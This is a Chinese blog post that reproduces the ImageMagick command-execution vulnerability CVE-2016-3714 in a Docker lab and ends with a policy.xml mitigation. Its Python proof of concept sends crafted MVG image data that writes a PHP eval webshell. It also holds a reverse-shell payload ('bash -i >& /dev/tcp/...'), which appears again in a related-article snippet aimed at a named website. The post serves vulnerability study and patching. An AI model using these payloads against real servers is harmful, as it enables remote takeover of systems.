ImageMagick 命令执行漏洞

最新推荐文章于 2024-05-23 15:28:21 发布
最新推荐文章于 2024-05-23 15:28:21 发布
阅读量2.7k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuiguowei/article/details/79070979
版权
docker
Docker是由一家叫做Dotcloud的公司出品。
Docker是一个由GO语言写的程序运行的容器; 目前云服务的基石是操作系统级别的隔离,在同一台物理服务器上虚拟出多个主机。Docker则实现了一种应用程序级别的隔离; 它改变我们基本的开发、操作单元,由直接操作虚拟主机(VM),转换到操作程序运行的“容器”上来。
它也是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。
容器是完全使用沙箱机制,相互之间不会有任何接口(类似iPhone的app),并且容器性能开销极低。
ImageMagick
ImageMagick 是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PHP imagick、Ruby rmagick和paperclip以及NodeJS imagemagick等多个图片处理插件都依赖它运行。
漏洞介绍
ImageMagick官方披露称,目前程序存在一处远程命令执行漏洞(CVE-2016–3714),当其处理的上传图片带有攻击代码时,可被远程执行任意代码,进而可能控制服务器
漏洞危害
成功利用该漏洞后,攻击者可以远程任意代码执行,在本次演示中,攻击者可以执行EXP在网站根目录写入一句话木马,直接拿到WebShell
步骤1:运行Docker镜像
首先使用 user123456的账号登录,然后切换到高权限用户,使用命令:
下面查看Docker当前有哪些可用的镜像,使用命令:
如上图所示,我们本次要用到的就是名称为cve-2016-3714的镜像。
接下来我们运行此镜像,使用命令:
这条命令的大意为:运行此镜像,临时命名为 ichunqiu, 并将80端口映射到本地的8080端口。
  • -p 表示port8080:80前者为默认的本地(127.0.0.1)端口,后者为镜像的端口
  • --name 表示制定临时名称
  • -itd 表示镜像在后台运行
  • 如图
然后进入镜像来启动apache服务,因为必须启动apache服务,网页才能正常的访问,使用命令:
启动完成之后,可以使用如下命令来查看是否启动成功:
如果出现如上图所示,就成功启动docker,并启动了apache服务。
最后再退出镜像,使用命令:EXIT。
步骤2:执行POC
我们首先来查看一下POC的主要内容:
python#!/usr/bin/env python# coding:utf-8import requestsimport base64def doPost(url, data): post_data = {"img": base64.b64encode(data)} try: requests.post(url + "/poc.php", data=post_data, timeout=1) except: pass# 写 webshelldef writeshell(url): writeshell = """push graphic-contextviewbox 0 0 640 480fill "url(https://example.com/1.jpg"|echo \"<?php eval($_POST[\"ant\"]);?>\" > shell.php")"pop graphic-context""" doPost(url, writeshell) resp2 = requests.post(url + "/shell.php", data={"ant": "echo md5(123);"}) if resp2.status_code == 200 and "202cb962ac59075b964b07152d234b70" in resp2.content: print "WebShell: " + url + "shell.php"def reverse_shell(url): reverse_shell = """push graphic-contextviewbox 0 0 640 480fill "url(https://example.com/1.jpg"|bash -i >& /dev/tcp/192.168.1.101/2333 0>&1")"pop graphic-context""" # 反弹 shell doPost(url, reverse_shell)if __name__ == "__main__": # 写 webshell writeshell("http://172.16.11.2:8080/") # 反弹 shell # reverse_shell("http://127.0.0.1:8000/")
它的功能是在网站根目录写入一句话木马,生成shell.php脚本。接下来我们执行它。
使用命令:
如上图,执行成功后,会返回一句话木马的地址。
我们再进入docker镜像里,查看是否真的写入了一句话木马,使用命令:
可以看到如下内容:
到这里就成功的验证了漏洞,并拿到了Webshell。
分析与总结
修复
使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加如下代码:
<policymap> <policy domain="coder" rights="none" pattern="EPHEMERAL" /> <policy domain="coder" rights="none" pattern="URL" /> <policy domain="coder" rights="none" pattern="HTTPS" /> <policy domain="coder" rights="none" pattern="MVG" /> <policy domain="coder" rights="none" pattern="MSL" /></policymap>
之后的工作,就是尝试在代码层修复此漏洞,因本人菜鸟一枚,无法进行尝试,待到相关知识面拓广至有此能力后会继续经行尝试修复。
kuiguowei
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ImageMagick漏洞汇总
Au
04-05 4513
ImageMagick 一款使用量很广的图片处理程序,许多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等功能 本文就简单的做个汇总,细节就概述了 CVE-2016-3714— RCE ImageMagick流行的原因之一,就是它功能强大,可以处理很多情况,而有一个功能delegate,作用是调用外部的lib来处理文件。调用外部lib就是执行system命令,...
深入浅析ImageMagick命令执行漏洞
09-21
ImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。接下来通过本文给大家浅析ImageMagick命令执行漏洞的知识,一起看看吧
ImageMagick爆高危命令执行漏洞
热门推荐
煜铭2011
05-09 1万+
0x01 前言 ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。众多的网站平台都是用他渲染处理图片。可惜在3号时被公开了一些列漏洞,其中一个漏洞可导致远程执行代码(RCE),如果你处理用户提交的图片。该漏洞是针对在野外使用此漏洞。许多图...
ImageMagick入门教程(免费图片格式转换)
最新发布
Colinnian的博客
05-23 769
imagemagick
ImageMagick命令注入漏洞(CVE-2016–3714)
HEAVEN569的博客
06-28 1136
震惊!!看图片也能中招!
ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记
u011975363的专栏
06-18 2176
学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个网站:
ImageMagick漏洞演示
hello_simon的专栏
05-05 2466
centos安装 wgethttp://downloads.jmagick.org/6.4.0/ImageMagick-6.4.0-0.tar.gz tar zvxf ImageMagick-6.4.0-0.tar.gz cd ImageMagick-6.4.0-0 ./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with
ImageMagick v6.2.7.rar
01-16
5. 命令行工具:ImageMagick包含一系列命令行工具,如`convert`、`animate`、`display`等,用户可以通过简单的命令实现各种图像处理任务。 6. 开发者接口:ImageMagick提供多种编程语言的API,如C、C++、Perl、...
ImageMagick
05-27
这个软件包的名称“ImageMagick-6.8.9-0-Q16-x64-static.exe”揭示了几个关键信息:版本号(6.8.9-0)、量子深度(Q16)以及平台兼容性(x64,表示适用于64位系统),并且是静态链接的执行文件。 1. **ImageMagick...
ImageMagick-7.0.10-10.tar.gz
05-11
2. **图片压缩**:ImageMagick中的`convert`命令可以用于图片的压缩。通过指定合适的质量参数,可以在保持图像可接受视觉效果的同时减小文件大小,例如: ``` convert input.jpg -quality 80% output.jpg ``` ...
Imagemagick PDF密码位置命令注入漏洞(CVE-2020-29599)
EC_Carrot的博客
07-02 639
漏洞背景 ImageMagick 6.9.11-40版本和7.x版本和7.0.10-40之前版本存在安全漏洞,该漏洞源于错误地处理了-authenticate选项,该选项允许为受密码保护的PDF文件设置密码。用户控制的密码没有被正确地转义,因此有可能通过程序员的pdf.c注入额外的shell命令漏洞复现 我这里用的是vulhub的环境,环境中svg文件已经上传至tmp目录下,进入靶机后,使用命令转换svg文件即可触发命令注入,并将输出结果写入到0wned文件内: convert poc.svg poc
php-imagick漏洞,PHP Imagick内存泄漏
weixin_35970228的博客
03-12 435
imagick使用共享库,它的内存使用对于PHP来说是遥不可及的,因此调整PHP内存和垃圾收集无济于事.我自己也有同样的问题,试图用50(!)页3000×2000像素来处理多页tiff图像.解决方案是让想象力将其像素缓存放在磁盘上.在创建Imagick对象之前添加它解决了我的问题:// pixel cache max sizeIMagick::setResourceLimit(imagick::R...
Imagemagick PDF密码位置命令注入漏洞
黑白的博客
05-02 569
声明 好好学习,天天向上 漏洞描述 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。研究者@insertScript 发现在Imagemagick 7.0.10-35到7.0.10-40、6.9.11-35 up到6.9.11-40处理PDF的过程中存在一处命令注入漏洞,通过构造好的SVG格式图片文件,即可在Imagemagick中注入任意命令。 影响范围 7.0.10-35到7.0.10-40 6.9.11-35 up到
ImageMagick 漏洞复现之路
一个码农的笔记
08-31 3790
我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的, 我们看看官方都是怎么修复的,并且还原漏洞现场 漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2
Imagetragick 命令执行漏洞(CVE-2016-3714)
EC_Carrot的博客
07-01 454
漏洞背景 ImageMagick是美国ImageMagick Studio公司的一套开源的图象处理软件。该软件可读取、转换、写入多种格式的图片。 ImageMagick 6.9.3-10之前版本和7.0.1-1之前7.x版本的多个编码器(EPHEMERAL,HTTPS,MVG,MSL,TEXT,SHOW,WIN,PLT)中存在远程代码执行漏洞,该漏洞源于程序没有充分过滤用户传入的shell字符。攻击者可通过上传恶意的图像利用该漏洞执行任意代码,获取敏感信息。 漏洞复现 访问http://your-ip:80
golang 如何将imagemagick 和golang 打包到docker 环境中
weixin_34348805的博客
11-30 160
Imagetragick 命令执行漏洞(CVE-2016–3714)
weixin_30376453的博客
07-25 368
Imagetragick介绍: ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞命令执行漏洞是出在 ImageMagick 对 https 形式的文件处理的过程中。 ImageMagick 之所以支...
漏洞学习——命令执行】开心网多处命令执行
Fly_鹏程万里
02-22 456
漏洞细节 漏洞URL1:http://www.kaixin001.com/set/logo.php 在修改头像处,上传正常图片的时候抓包,把下面这个payload直接添加上去就可以直接反弹shell push graphic-context viewbox 0 0 640 480 image copy 200,200 100,100 "|bash -i >& /dev/tcp...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值